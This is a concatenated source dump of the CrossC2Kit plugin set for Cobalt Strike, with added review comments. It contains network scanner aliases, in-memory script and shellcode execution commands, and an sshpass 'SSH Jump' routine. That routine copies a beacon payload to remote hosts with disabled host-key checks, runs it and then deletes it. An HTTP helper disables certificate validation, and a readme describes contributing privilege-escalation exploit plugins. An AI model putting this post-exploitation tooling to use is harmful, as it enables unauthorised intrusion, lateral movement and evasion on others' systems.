#   $4 port spec, $5 scan type.  The three scan arguments are joined with "^"
#   and passed verbatim to the module; only their presence is checked here,
#   no format validation happens on the operator side.
# All variables are script-global (no local()), as in the other aliases.
ssh_alias cc2_portscan_dyn {
    $taskName = "cc2_portscan";
    $taskType = "so";
    $taskResType = "portscan";

    $beaconid = $1;
    $arch = $2;
    $host = $3;
    $port = $4;
    $scan_type = $5;
    $transportArg = $host . "^" . $port . "^" . $scan_type;

    if ($arch eq "osx") {
        $loadlib = "scanner/ServerScan/osx/crossc2_portscan.dylib";
    } else if ($arch eq "linux32") {
        $loadlib = "scanner/ServerScan/linux/SO/crossc2_portscan386.so";
    } else if ($arch eq "linux") {
        $loadlib = "scanner/ServerScan/linux/SO/crossc2_portscan.so";
    } else {
        berror($beaconid, "*[error]: system");
        printUsage_portscan_dyn($beaconid);
        return;
    }
    if ($host && $port && $scan_type) {
        # Console label says "cc2_serverscan" even in the portscan aliases.
        blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type);
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_portscan_dyn($beaconid);
    }

}

ssh_command_register("cc2_portscan_dyn", "CrossC2 PortScan Dyn(3.8M) - Scan a network for open services", "\nby: trim\nUsage: cc2_portscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");

# cc2_serverscan_dyn: same shape as cc2_portscan_dyn with the serverscan
# module (service/version detection per the registered description).
ssh_alias cc2_serverscan_dyn {
    $taskName = "cc2_serverscan";
    $taskType = "so";
    $taskResType = "portscan";

    $beaconid = $1;
    $arch = $2;
    $host = $3;
    $port = $4;
    $scan_type = $5;
    $transportArg = $host . "^" . $port . "^" . $scan_type;

    if ($arch eq "osx") {
        $loadlib = "scanner/ServerScan/osx/cc2_serverscan.dylib";
    } else if ($arch eq "linux32") {
        $loadlib = "scanner/ServerScan/linux/SO/crossc2_serverscan386.so";
    } else if ($arch eq "linux") {
        $loadlib = "scanner/ServerScan/linux/SO/crossc2_serverscan.so";
    } else {
        berror($beaconid, "*[error]: system");
        printUsage_ServerScan_dyn($beaconid);
        return;
    }
    if ($host && $port && $scan_type) {
        blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type);
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_ServerScan_dyn($beaconid);
    }

}

ssh_command_register("cc2_serverscan_dyn", "CrossC2 ServerScan Dyn(9.8M) - Scan a network for open services and services version detection", "\nby: trim\nUsage: cc2_serverscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");



# ELF / MachO
# cc2_portscan: standalone-executable ("ELF") variant of cc2_portscan_dyn.
# The registered description notes it "will be seen in the process" list,
# i.e. it runs as a separate process rather than in the beacon's memory.
ssh_alias cc2_portscan {
    $taskName = "cc2_portscan";
    $taskType = "ELF";
    $taskResType = "portscan";

    $beaconid = $1;
    $arch = $2;
    $host = $3;
    $port = $4;
    $scan_type = $5;
    $transportArg = $host . "^" . $port . "^" . $scan_type;

    if ($arch eq "osx") {
        $loadlib = "scanner/ServerScan/osx/portscan";
    } else if ($arch eq "linux32") {
        $loadlib = "scanner/ServerScan/linux/ELF/portscan386";
    } else if ($arch eq "linux") {
        $loadlib = "scanner/ServerScan/linux/ELF/portscan";
    } else {
        berror($beaconid, "*[error]: system");
        printUsage_portscan($beaconid);
        return;
    }
    if ($host && $port && $scan_type) {
        blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type);
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_portscan($beaconid);
    }

}

ssh_command_register("cc2_portscan", "CrossC2 PortScan(1.1M) - Scan a network for open services, but it will be seen in the process", "\nby: trim\nUsage: cc2_portscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");

# cc2_serverscan: ELF variant of cc2_serverscan_dyn.
ssh_alias cc2_serverscan {
    $taskName = "cc2_serverscan";
    $taskType = "ELF";
    $taskResType = "portscan";

    $beaconid = $1;
    $arch = $2;
    $host = $3;
    $port = $4;
    $scan_type = $5;
    $transportArg = $host . "^" . $port . "^" . $scan_type;

    if ($arch eq "osx") {
        $loadlib = "scanner/ServerScan/osx/serverscan";
    } else if ($arch eq "linux32") {
        # NOTE(review): these two Linux paths point under linux/SO/, while the
        # sibling ELF alias cc2_portscan and the file list on this page use
        # linux/ELF/ for the serverscan executables -- confirm which is intended.
        $loadlib = "scanner/ServerScan/linux/SO/serverscan386";
    } else if ($arch eq "linux") {
        $loadlib = "scanner/ServerScan/linux/SO/serverscan";
    } else {
        berror($beaconid, "*[error]: system");
        printUsage_ServerScan($beaconid);
        return;
    }
    if ($host && $port && $scan_type) {
        blog($beaconid, "cc2_serverscan: " . $host . " " . $port . " " . $scan_type);
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_ServerScan($beaconid);
    }

}

ssh_command_register("cc2_serverscan", "CrossC2 ServerScan(3M) - Scan a network for open services and services version detection, but it will be seen in the process", "\nby: trim\nUsage: cc2_serverscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");


-------------------------------------------------------------------------------- /script/python-import.cna: --------------------------------------------------------------------------------

#include(script_resource("CrossC2Kit.cna"));

# Minimal usage text for the python-import alias.
sub printUsage_importscript {
    blog($1, "\nUsage: import");
}

# python-import: ships a local Python file ($2) to the beacon through
# brun_script_in_mem (defined elsewhere) with a script type of
# 'python-import$<module>', where <module> is the file's basename up to its
# last '.'.  The result type is "info".  Variables are script-global.
ssh_alias python-import {
    $taskResType = "info"; # info -> normal message

    $beaconid = $1;
    $scriptType = 'python-import$';
    $scriptEnginePath = 'null';
    $scriptLocalPath = $2;
    $transportArg = '';

    # basename: everything after the last '/'.
    # NOTE(review): if $2 contains no '/', the result depends on what lindexOf
    # returns for "not found" -- confirm before relying on bare filenames.
    $pathIndex = lindexOf($scriptLocalPath, '/');
    $pathIndex += 1;
    $filename = substr($scriptLocalPath, $pathIndex);

    # module name: basename up to its last '.'.
    $importName = substr($filename, 0, lindexOf($filename, '.'));
    blog($1, "[Python]: import ".$importName);
    $scriptType = $scriptType.$importName;

    if ($scriptType && $scriptLocalPath) {
        # Same engine-path convention as cc2_script in runScript.cna: a '/'
        # in the type string makes it the interpreter path.  Here the type is
        # built from the module name, so this only fires for odd filenames.
        if (indexOf($scriptType, "/")) {
            $scriptEnginePath = $scriptType;
        }
        brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, $transportArg);
    } else {
        berror($beaconid, "*[error]: error script load");
        printUsage_importscript($beaconid);
    }
}

# Registered with a placeholder description ("aaa") and no usage text.
ssh_command_register("python-import", "aaa\n");

-------------------------------------------------------------------------------- /script/runScript.cna: --------------------------------------------------------------------------------

#include(script_resource("CrossC2Kit.cna"));

# Usage text for cc2_script.  (Angle-bracket placeholders were stripped by
# markup, leaving "[|]" where the engine/path alternatives were.)
sub printUsage_script {
    blog($1, "\nUsage: cc2_script [|] \n\tcc2_script python c:\\getsysteminfo.py all\n\tcc2_script /usr/bin/ruby c:\\getsysteminfo.rb all\n\t\t\tpython/bash/perl/ruby\n\t\t\t/bin/bash | /usr/bin/python | /usr/bin/perl (default seach ScriptName in SystemPath.)\n");
}

# cc2_script: run a local script file on the beacon through
# brun_script_in_mem (defined elsewhere).
#   $1 beacon id, $2 engine name or interpreter path, $3 local script path,
#   $4 argument string.  All three of $2/$3/$4 must be non-empty.
# If $2 contains a '/', it is treated as the interpreter path; otherwise the
# engine path stays the literal string 'null'.
# NOTE(review): indexOf() of a leading '/' is position 0; whether 0 counts as
# true in this if() decides if "/usr/bin/ruby" is honoured -- confirm.
ssh_alias cc2_script {
    $taskResType = "info"; # info -> normal message

    $beaconid = $1;
    $scriptType = $2;
    $scriptEnginePath = 'null';
    $scriptLocalPath = $3;
    $transportArg = $4;


    if ($scriptType && $scriptLocalPath && $transportArg) {
        if (indexOf($scriptType, "/")) {
            $scriptEnginePath = $scriptType;
        }
        brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, $transportArg);
    } else {
        berror($beaconid, "*[error]: error script load");
        printUsage_script($beaconid);
    }

}

ssh_command_register("cc2_script", "CrossC2 Script - run scripts in memory", "\nUsage: cc2_script [|] \n\tcc2_script python c:\\getsysteminfo.py all\n\tcc2_script /usr/bin/ruby c:\\getsysteminfo.rb all\n\t\t\tpython/bash/perl/ruby\n\t\t\t/bin/bash | /usr/bin/python | /usr/bin/perl (default seach ScriptName in SystemPath.)\n");


# Per-interpreter aliases: each forwards the raw argument list (@_, beacon id
# first) to CrossC2MemScriptEng (defined elsewhere) with result type "info".
# The engine name is the only thing that differs between them.
ssh_alias python {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("python", $taskResType, @_);
}

ssh_command_register("python", "CrossC2 Python Script - run script in memory", "\nUsage: python [|] \n\tpython c:\\getsysteminfo.py \n\tpython import os; os.system('whoami')\n");


ssh_alias bash {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("bash", $taskResType, @_);
}

# zsh has no ssh_command_register entry of its own, unlike its siblings.
ssh_alias zsh {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("zsh", $taskResType, @_);
}

ssh_command_register("bash", "CrossC2 Bash Script - run script in memory", "\nUsage: bash [|] \n\tbash c:\\getsysteminfo.sh \n\tbash for i in `ls`;do echo \$i; done\n");

ssh_alias perl {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("perl", $taskResType, @_);
}

ssh_command_register("perl", "CrossC2 Perl Script - run script in memory", "\nUsage: perl [|] \n\tperl c:\\getsysteminfo.pl\n\tperl \$a = 'hello';print \$a\n");

ssh_alias ruby {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("ruby", $taskResType, @_);
}

ssh_command_register("ruby", "CrossC2 Ruby Script - run script in memory", "\nUsage: ruby [|] \n\truby c:\\getsysteminfo.rb\n\truby puts 'hello'\n");


ssh_alias php {
    $taskResType = "info"; # info -> normal message
    CrossC2MemScriptEng("php", $taskResType, @_);
}

ssh_command_register("php", "CrossC2 PHP Script - run script in memory", "\nUsage: php [|] \n\tphp c:\\getsysteminfo.php\n\tphp \n");


# Callback for the RunScriptInMemory dialog.  $bid is the global set by
# openRunScriptDialog.  With a file chosen, the argument list is
# @(bid, file, arg1..argN); otherwise the typed content is split on single
# spaces into @(bid, word1..wordN).  Quoting is not honoured by the split.
sub openRunScriptDialogCallBack {
    $scriptFile = $3['scriptFile'];
    $scriptContent = $3['scriptContent'];
    $scriptType = $3['scriptType'];
    $scriptArgs = $3['scriptArgs'];
    $taskResType = "info"; # info -> normal message

    if ($scriptFile ne $null) {
        @script_config = @($bid, $scriptFile); # script_config => @( bid, script_path, arg1, arg2, ... , argN )
        @script_args = split(" ", $scriptArgs);
        foreach $index => $value (@script_args) {
            push(@script_config,$value);
        }
        CrossC2MemScriptEng($scriptType, $taskResType, @script_config);
    } else {
        @script_config = @($bid); # script_config => @( bid, script_content_split_with_space )
        @script_args = split(" ", $scriptContent);
        foreach $index => $value (@script_args) {
            push(@script_config,$value);
        }
        CrossC2MemScriptEng($scriptType, $taskResType, @script_config);
    }
}

# Builds the RunScriptInMemory dialog for beacon $1: engine combobox, file
# picker, argument line, and a big text area for inline content.
sub openRunScriptDialog {
    $bid = $1;
    $dialog = dialog("RunScriptInMemory", %(bid => $bid, scriptFile => "", scriptContent => "", scriptType => "", scriptArgs => ""), &openRunScriptDialogCallBack);
    dialog_description($dialog, "run script in memory");

    drow_combobox($dialog, "scriptType", "scriptType: ", @("bash", "python", "zsh", "perl", "ruby", "php"));
    drow_file($dialog, "scriptFile", "scriptFile: ");
    drow_text($dialog, "scriptArgs", "run args: ");

    drow_text_big($dialog, "scriptContent", "or input Script Content:");

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}
-------------------------------------------------------------------------------- /spawn/runshellcode.cna: --------------------------------------------------------------------------------
# bshellcode: hands a shellcode string ($2, "\x.." escapes as typed) to the
# beacon $1 via a loader module, result type "info".  The full shellcode is
# echoed to the console first.  No local() declarations: all globals.
# NOTE(review): the os/arch branch below assigns $loadlib, but the unconditional
# assignment right after it wins, so every platform loads spawn/spawnas.so and
# the "unsupport platform" error can never trigger.  $arch is also never set
# in this sub, so the inner comparisons read whatever global is current.
sub bshellcode{
    $bid = $1;
    $shellcode = $2;
    $taskName = "cc2_spawn"; # taskName
    $taskType = "so"; # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # info -> normal message
    blog($bid, $shellcode);
    $transportArg = $shellcode."^";

    $os = lc(beacon_info($bid, "os"));
    if ('linux' isin $os) {
        if ($arch eq 'x86') {
            $loadlib = "jobs/cc2_jobs32.so";
        } else if ($arch eq 'x64') {
            $loadlib = "spawn/spawnas.so";
        }
    } else if ('macos' isin $os) {
        $loadlib = "jobs/cc2_jobs.dylib";
    }
    $loadlib = "spawn/spawnas.so";

    if ($loadlib) {
        blog($bid, "run shellcode");
        bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        berror($bid, "unsupport platform");
    }

}

ssh_alias("cc2_shellcode", &bshellcode);

ssh_command_register("cc2_shellcode", "CrossC2 Run shellcode", "\nUsage: cc2_shellcode \\x80\\x95\\x90....\\x90 ");

# Dialog callback; $bid is the global set by openShellCodeDialog.
sub openShellCodeDialogCallBack {
    $shellcode = $3['shellcode'];
    bshellcode($bid, $shellcode);
}

# Builds the RunShellCode dialog for beacon $1 (one big text field,
# pre-filled with four NOP escapes).
sub openShellCodeDialog {
    $bid = $1;
    $dialog = dialog("RunShellCode", %(bid => $bid, shellcode => "\\x90\\x90\\x90\\x90"), &openShellCodeDialogCallBack);
    dialog_description($dialog, "run shellcode");

    drow_text_big($dialog, "shellcode", "shellcode: ");

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}

# Platform label for the status column: 'MacOS(intel)', 'Linux32', 'Linux64'
# or ''.  Same result as cc2_auth_status / cc2_ssh_status, macOS tested first.
sub cc2_shellcode_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('macos' isin $os) {
        return 'MacOS(intel)';
    } else if ('linux' isin $os) {
        if ($arch eq 'x86') {
            return 'Linux32';
        } else if ($arch eq 'x64') {
            return 'Linux64';
        }
    }
    return '';
}
-------------------------------------------------------------------------------- /spawn/runshellcode.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/spawn/runshellcode.dylib -------------------------------------------------------------------------------- /spawn/runshellcode.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/spawn/runshellcode.so --------------------------------------------------------------------------------
/spawn/runshellcode32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/spawn/runshellcode32.so -------------------------------------------------------------------------------- /sshpass/sshpass.cna: --------------------------------------------------------------------------------
# bssh_pass: copies an already-uploaded payload file to one remote host over
# scp and starts it over ssh, both driven by the bundled sshpass helper.
#   $1 beacon id        $2 username       $3 password      $4 private key
#   $5 pass type        $6 target host    $7 path of the payload on both ends
# What this leaves on the wire and on disk (the detection surface):
#   - the password travels on the helper's command line (`-p <password>`), so
#     it is visible in the beacon host's process list while the task runs;
#   - host-key checking is disabled (UserKnownHostsFile=/dev/null,
#     StrictHostKeyChecking=no), so no known_hosts entry is written;
#   - on the target: $ObjectPath is created, chmod 755, executed, and removed
#     after `sleep 10`; on the beacon host it is removed after `sleep 5`.
# $privatekey is only tested for being non-empty; both command lines use
# $password, so the ssh-key dialog path ends up password-driven here.
# $passtype and $bd are assigned but never used.
sub bssh_pass {
    local('$bid $username $password $privatekey $passtype $host $ObjectPath $taskName $taskType $taskResType');
    local('$upload_beacon_line $transArray $upload_beacon $cmd $trans $run_beacon $bd $os $arch $loadlib');
    $bid = $1;
    $username = $2;
    $password = $3;
    $privatekey = $4;
    $passtype = $5;
    $host = $6;
    $ObjectPath = $7;

    $taskName = "cc2_sshpass";
    $taskType = "ELF";
    $taskResType = "info";

    # upload beacon
    # Command line is split on single spaces, so a password or path containing
    # a space is broken into separate arguments.
    $upload_beacon_line = "python -p ".$password." scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ".$ObjectPath.' '.$username."@".$host.":".$ObjectPath;
    $transArray = split(" ", ["$upload_beacon_line" trim]);
    $upload_beacon = transportArgs(0, $transArray);

    $transArray = $null;

    # run beacon
    # The remote command is appended as one argument, after the split.
    $cmd = 'chmod 755 '.$ObjectPath.';'.$ObjectPath.';sleep 10;rm -rf '.$ObjectPath;
    $trans = "python -p ".$password." ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ".$username."@".$host;
    $transArray = split(" ", ["$trans" trim]);
    add($transArray, $cmd, -1);
    $run_beacon = transportArgs(0, $transArray);

    $bd = bdata($bid);
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    $loadlib = $null;
    btask($bid, "RUN: cc2_sshpass");

    # sshpass helper binary per beacon platform; stays $null otherwise, which
    # silently skips the whole operation in the guard below.
    if ('linux' isin $os) {
        if ($arch eq 'x86') {
            $loadlib = 'sshpass/sshpass32';
        } else if ($arch eq 'x64') {
            $loadlib = 'sshpass/sshpass64';
        }
    } else if ('macos' isin $os) {
        $loadlib = 'sshpass/sshpass';
    }

    if ($host && $username && (($password ne "") || ($privatekey ne "")) && $loadlib) {
        btask($bid, 'ssh pass -> '.$username.'@'.$host);
        btask($bid, 'upload beacon to '.$username.'@'.$host);
        # bcrossc2_load_dyn_pro is defined elsewhere; the 'Y'/'N'/11 arguments
        # are its own flags -- meaning not visible from this file.
        bcrossc2_load_dyn_pro($bid, $taskType, $taskName, $taskResType, 'Y', 'N', 11, $loadlib, $upload_beacon);
        btask($bid, 'run beacon on '.$username.'@'.$host);
        bcrossc2_load_dyn_pro($bid, $taskType, $taskName, $taskResType, 'Y', 'N', 11, $loadlib, $run_beacon);
        bshell($bid, 'sleep 5&&rm -rf '.$ObjectPath);
    }
}

# Completion callback for bawait_upload_raw in bssh_jump: $1 is the beacon,
# $2 the argument array packed there.  Calls bssh_pass once per host.
# NOTE(review): the loop iterates the script-global $targetArray (set in
# jumpSSHdialogCallBack), not the $hostArray unpacked from $2 two lines above.
# No local() here either, so $username/$password/... become globals.
sub bssh_jump_cb {
    # @($username, $password, $privatekey, $passtype, $hostArray, $cmd)
    $bid = $1;
    $username = $2[0];
    $password = $2[1];
    $privatekey = $2[2];
    $passtype = $2[3];
    $hostArray = $2[4];
    $cmd = $2[5];

    foreach $index => $value ($targetArray) {
        bssh_pass($bid, $username, $password, $privatekey, $passtype, $value, $cmd);
    }
}

# bssh_jump: fetches the payload for listener $6 (getCrossC2Beacon, defined
# elsewhere), uploads it to the beacon host under $8 (default '/tmp/') with a
# random 8-character name, then continues in bssh_jump_cb.  With the default
# the path becomes '/tmp//<name>' (double slash, harmless to the shell).
# Errors out if the listener yields no payload bytes.
sub bssh_jump {
    # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workpath);
    $bid = $1;
    $username = $2;
    $password = $3;
    $privatekey = $4;
    $passtype = $5;
    $listener = $6;
    $hostArray = $7;

    $savepath = $8;
    $savename = random_string(8);
    if ($savepath eq '') {
        $savepath = '/tmp/';
    }
    $ObjectPath = $savepath.'/'.$savename;


    btask($bid, "[bssh_jump]: ------ sshpass ------");
    $beaconData = getCrossC2Beacon($listener, "main");
    if (strlen($beaconData) > 0) {
        bawait_upload_raw($bid, $beaconData, $savepath, $savename, &bssh_jump_cb, @($username, $password, $privatekey, $passtype, $hostArray, $ObjectPath));
    } else {
        berror($bid, "[bssh_jump]: maybe no beacondata in CrossC2Listener: $listener");
    }
}
# reverse_https -> scp upload & ssh run
# bind_tcp -> althttpd -> ssh ?


# Callback for the "CrossC2 SSH Jump" dialog.  Resolves the chosen
# "internal@computer" label back to an active SSH session id by scanning
# beacons(); inactive sessions are skipped by the empty if-branch.
# targetLines arrives as the targets popup renders it ("[a, b, c]"): brackets
# are stripped and the rest split on ", ".  Nothing happens if no session
# matched or listener/session were left unset.
sub jumpSSHdialogCallBack {
    $targetLines = $3['targetLines'];
    $username = $3['username'];
    $password = $3['password'];
    $privatekey = $3['privatekey'];
    $passtype = $3['passtype'];
    $listener = $3['listener'];
    $session = $3['session'];
    $bid = $null;
    $workspace = $3['workspace'];

    if ($listener && $session) {
        # get bid with select session
        foreach $beacon (beacons()) {
            ($internal, $computer) = values($beacon, @('internal', 'computer'));
            $tempMenuBar = $internal."@".$computer;
            if (!-isactive $beacon['id']) {
            } else if ((-isssh $beacon['id']) && ($tempMenuBar eq $session)) {
                $bid = $beacon['id'];
            }
        }

        if ($bid) {
            $targetLines = replace($targetLines, '\[', "");
            $targetLines = replace($targetLines, '\]', "");
            $targetArray = split(", ", ["$targetLines" trim]);

            bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace);
        }
    }
}

# Builds the SSH Jump dialog.  $1 is "ssh" or "ssh-key" (selects whether a
# password or a private-key field is shown), $2 the selected targets.
# Listener and session comboboxes are filled from getCrossC2Listener() and
# getSSHSession() (both defined elsewhere); only element [0] of each map
# value is used as the label.
# NOTE(review): in the defaults map, `$listener => $null, $session => $null`
# use the *values* of those globals as keys rather than the literal names
# "listener"/"session"; presumably harmless because the comboboxes supply
# those fields -- confirm.
sub jumpSSHdialog {
    %beaconListenerMap = getCrossC2Listener();
    @beaconListenerMenu = @();
    foreach $key => $value (%beaconListenerMap) {
        add(@beaconListenerMenu, $value[0]);
    }

    @sessionMenu = @();
    %sessionMap = getSSHSession();
    foreach $key => $value (%sessionMap) {
        add(@sessionMenu, $value[0]);
    }


    $targetArray = $2;
    $dialog = dialog("CrossC2 SSH Jump", %(username => "root", password => "", privatekey => "", $listener => $null, $session => $null, targetLines => $targetArray, passtype => $1, workspace => "/tmp/"), &jumpSSHdialogCallBack);
    drow_text($dialog, "username", "login username: ", 20);
    if ($1 eq "ssh") {
        drow_text($dialog, "password", "login password: ", 20);
    } else if ($1 eq "ssh-key") {
        drow_text($dialog, "privatekey", "login privatekey: ", 20);
    }
    drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu);
    drow_combobox($dialog, "session", "Session: ", @sessionMenu);
    drow_text($dialog, "workspace", "workspace: ", 20);

    dbutton_action($dialog, "Jump");
    dialog_show($dialog);
}

# Adds "CC2—Jump > sshpass > ssh | ssh-key" to the targets context menu;
# $1 is the list of selected targets handed to jumpSSHdialog.
popup targets {
    separator();
    menu "&CC2—Jump" {
        menu "&sshpass" {
            item "ssh" {
                jumpSSHdialog("ssh", $1);
            }
            item "ssh-key" {
                jumpSSHdialog("ssh-key", $1);
            }
        }
    }
}
-------------------------------------------------------------------------------- /sshpass/sshpass64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/sshpass/sshpass64 -------------------------------------------------------------------------------- /third-party/readme.md: -------------------------------------------------------------------------------- 1 | # 插件提交方式 2 | 3 | 4 | 1. git clone https://github.com/CrossC2/CrossC2Kit.git 5 | 2. cd CrossC2Kit && mkdir third-party 6 | 3. 将插件置入该目录后进行 pull request 7 | 4.
pull request 项目将在自动编译通过后进行合并


```c
├── third-party
│   ├── test.cna
│   └── util
│ ├── lpe // 插件分类
│ │ ├── cve-2021-1102 // 插件名称
│ │ │ ├── load.cna // 插件启动入口 *
│ │ │ ├── readme.md // 插件文档
│ │ │ ├── src // 插件包含的二进制组件源码目录
│ │ │ │ ├── exp.c // 待编译的源码 *
│ │ │ │ └── makefile // 自动编译的工程配置文件 *
│ │ │ └── testa.cna // 插件内部用到的cna脚本
│ │ └── cve-2022-2202
│   │   ├── load.cna
│   │   ├── readme.md
│   │   └── src
│   │   ├── exp.c
│   │   └── makefile
│   └── pass
│   ├── linux-login
│   │   ├── load.cna
│   │   └── src
│   │   ├── exp.c
│   │   └── makefile
│   └── readme.md
```

5. 编译结果将在 **summary** 中显示,包含`系统架构信息`、`编译过程`、`编译结果符号信息`、`Linux包含GLIBC版本信息`、`编译整体结果`

--------------------------------------------------------------------------------
/update_site/SSLUtils.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/update_site/SSLUtils.jar
--------------------------------------------------------------------------------
/update_site/httprequest.cna:
--------------------------------------------------------------------------------
#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#
# NOTE(review): "safe & sound" refers to error handling, not to transport security —
# every connection made below goes through [$SSL ignoreSsl], see the comment there.
#

__CC2_INIT__:import SSLUtils from: __CC2_INIT_PATH__/update_site/SSLUtils.jar;

import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;


#
# httpRequest($method, $url, $body);
#
#   $1 = HTTP method ("GET", "POST", ...)
#   $2 = absolute URL
#   $3 = request body; when non-empty it is sent as application/x-www-form-urlencoded
#   $4 = (internal) redirect depth, used by the recursive redirect handling
#
# Returns the response body with CRLF line endings (trailing CRLF removed), or ""
# when the redirect limit is exceeded or any exception is raised. Callers cannot
# distinguish "" returned for a failure from a genuinely empty body.
#
sub httpRequest {
    $method = $1;
    $url = $2;
    $body = $3;
    $n = 0;
    # println("request ".$url);

    if(size(@_) == 4) { $n = $4; }

    $bodyLen = strlen($body);
    # Hard cap on the redirect chain so a redirect loop cannot recurse forever.
    $maxRedirectsAllowed = 10;
    if ($n > $maxRedirectsAllowed) {
        warn("Exceeded maximum number of redirects: $method $url ");
        return "";
    }

    try
    {
        $urlobj = [new java.net.URL: $url];
        $con = $null;
        $SSL = [new SSLUtils];
        # NOTE(review): ignoreSsl lives in SSLUtils.jar (not visible here); by its name it
        # presumably disables certificate validation process-wide, which is what makes the
        # team server's self-signed site certificate accepted — but it also removes server
        # authentication for every URL this helper ever fetches, including the script
        # bodies update_site.cna later re-hosts. Trusting/pinning the team server
        # certificate would be the safer equivalent. Confirm against SSLUtils.
        [$SSL ignoreSsl];
        $con = [$urlobj openConnection];
        [$con setRequestMethod: $method];
        [$con setInstanceFollowRedirects: true];
        [$con setRequestProperty: "Accept", "*/*"];
        [$con setRequestProperty: "Cache-Control", "max-age=0"];
        [$con setRequestProperty: "Connection", "keep-alive"];
        # [$con setRequestProperty: "User-Agent", $USER_AGENT];
        [$con setRequestProperty: "User-Agent", "bot"];
        [$con setConnectTimeout: 3000];
        [$con setReadTimeout: 3000];

        if($bodyLen > 0) {
            [$con setDoOutput: true];
            [$con setRequestProperty: "Content-Type", "application/x-www-form-urlencoded"];
        }

        # NOTE(review): getOutputStream is requested even when no body is sent and
        # setDoOutput was never called; HttpURLConnection is documented to reject that
        # with a ProtocolException, which would land a body-less GET in the catch
        # block below and return "". Confirm whether the GET path actually succeeds.
        $outstream = [$con getOutputStream];
        if($bodyLen > 0) {
            [$outstream write: [$body getBytes]];
        }

        $inputstream = [$con getInputStream];
        $handle = [SleepUtils getIOHandle: $inputstream, $outstream];
        $responseCode = [$con getResponseCode];

        # Manual redirect handling on top of setInstanceFollowRedirects: the Location
        # header is followed with the same method and body, whatever host or scheme
        # it points to (no check that an https:// request stays on https://).
        if(($responseCode >= 301) && ($responseCode <= 304)) {
            $loc = [$con getHeaderField: "Location"];
            return httpRequest($method, $loc, $body, $n + 1);
        }

        @content = readAll($handle);
        $response = "";
        foreach $line (@content) {
            $response .= $line . "\r\n";
        }

        # Drop the CRLF appended after the last line.
        if((strlen($response) > 2) && (right($response, 2) eq "\r\n")) {
            $response = substr($response, 0, strlen($response) - 2);
        }

        return $response;
    }
    catch $message
    {
        # Any failure (connect/read timeout, non-2xx raised by getInputStream, the
        # getOutputStream case above) is logged with a stack trace and reported as "".
        warn("HTTP Request failed: $method $url : $message ");
        printAll(getStackTrace());
        return "";
    }
}
--------------------------------------------------------------------------------
/update_site/update_site.cna:
--------------------------------------------------------------------------------
include(script_resource("update_site/httprequest.cna"));
# Adds "Update Script" to the generator menu; opens the script picker dialog.
popup generator {
    separator();
    item "&Update Script" {
